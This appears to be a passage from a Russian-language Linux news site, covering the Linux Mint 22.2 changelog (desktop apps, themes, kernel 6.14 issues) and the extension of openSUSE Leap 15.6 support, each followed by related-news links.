• Модернизирован экран входа в систему - при отображении панели и в диалоговом окне задействован эффект размытия. Пользователям предоставлена возможность назначения картинки c аватаром.
• В приложении для ведения заметок Sticky добавлена поддержка протокола Wayland и реализовано скругление верхних углов в интерфейсе. Добавлен метод D-Bus для перезагрузки заметок. Подготовлен мобильный вариант приложения для платформы Android.
• Расширены возможности IPTV-проигрывателя Hypnotix, в котором помимо вывода на весь экран добавлены два дополнительных режима отображения - "театральный" и "безрамочный". В "театральном" режиме содержимое выводится в окне с заголовком, но без элементов управления и меню. В "безрамочном" режиме дополнительно скрываются заголовок и рамки окна (для захвата окна мышью следует удерживать клавишу Alt). В новой версии также ускорен запуск приложения, оптимизированы функции поиска в крупных списках воспроизведения, убран сброс изменения громкости при смене каналов и обеспечена блокировка активации хранителя экрана во время воспроизведения.
• Расширены возможности приложений, построенных на базе библиотеки xapp, предоставляющей надстройку над GTK с элементами для унификации работы в различных пользовательских окружениях (Cinnamon, MATE и Xfce). В приложениях XApps применены современные технологии (GTK3 для поддержки HiDPI, gsettings и т.п.), но сохранены традиционные элементы интерфейса, такие как панель инструментов и меню. Среди таких приложений: текстовый редактор Xed, менеджер фотографий Pix, просмотрщик документов Xreader, просмотрщик изображений Xviewer.
  • В Xviewer реализована возможность настройки коррекции цветов на основе параметров монитора, выдаваемых через EDID.
  • Добавлено приложение xapp-aiff-thumbnailer для генерации миниатюр с изображением обложек, интегрированных в звуковые файлы в формате aiff.
  • Предложен порт приложения Warpinator (шифрованный обмен файлами между двумя компьютерами) для платформы iOS.
  • В WebApp Manager разрешено редактировать поле с описанием web-приложения.
  • В утилите для переименования группы файлов появилась возможность добавление лидирующего нуля перед порядковым номером в имени файла. Также добавлена поддержка задания стартового значения счётчика и шага увеличения порядкового номера. Обеспечено запоминание последней операции переименования.
• Внесены изменения в темы оформления, в которых вместо чистого серого цвета задействован серый цвет с синим оттенком, что придало элементам интерфейса более металлический и современный вид.
• Улучшено оформление основного экрана менеджера приложений (Software Manager). Добавлена подсказка с описанием отличий между системными пакетами и пакетами в формате Flatpak.
• В ситуации, когда после обновления требуется перезагрузка системы, теперь выводится специальная кнопка для перезагрузки.
• В основном меню среды рабочего стола MATE улучшена точность поиска.
• Ядро Linux обновлено до версии 6.14. При использовании данного ядра отмечаются проблемы с Virtualbox и старыми GPU Intel и NVIDIA, при возникновении которых рекомендовано вначале установить Linux Mint 22.1 с ядром 6.8, а затем обновить систему до версии 22.2 без переключения на ядро 6.14.
• Как и в прошлом выпуске продолжают поставляться версии сред рабочего стола Cinnamon 6.4, MATE 1.28 и Xfce 4.20.

1. Главная ссылка к новости
2. OpenNews: Релиз дистрибутива Linux Mint 22.1
3. OpenNews: Выпуск среды рабочего стола Cinnamon 6.4
4. OpenNews: Релиз дистрибутива Linux Mint 22
5. OpenNews: Linux Mint развивает новое приложение для чата после сворачивания IRC-клиента HexChat
6. OpenNews: Первые результаты портирования Cinnamon на Wayland

C 2009 года в openSUSE срок поддержки составлял полтора года - год до следующего выпуска + полгода давалось на переход на новую версию. Так как на разработку первого выпуска новой ветки openSUSE Leap 16 потребовалось больше времени, чем обычно, для выпуска openSUSE Leap 15.6, сформированного в июне прошлого года, сделано исключение и срок его поддержки продлён на дополнительные 4 месяца (общий срок публикации обновлений составит 1 год и 10 месяцев). Начиная с openSUSE 16 поддержка выпусков будет осуществляться в течение двух полных циклов подготовки новых релизов. Для тех кому недостаточно двух лет поддержки предоставляется инструментарий для миграции установок на дистрибутивы SUSE Linux Enterprise и SUSE Linux Enterprise Micro.

1. Главная ссылка к новости
2. OpenNews: Дистрибутив openSUSE опубликовал альтернативный инсталлятор Agama 17
3. OpenNews: Кандидат в релизы дистрибутива openSUSE Leap 16
4. OpenNews: openSUSE прекращает поставку Deepin из-за установки небезопасных компонентов в обход RPM
5. OpenNews: openSUSE тестирует поддержку повторяемых сборок
6. OpenNews: Релиз дистрибутива openSUSE Leap 15.6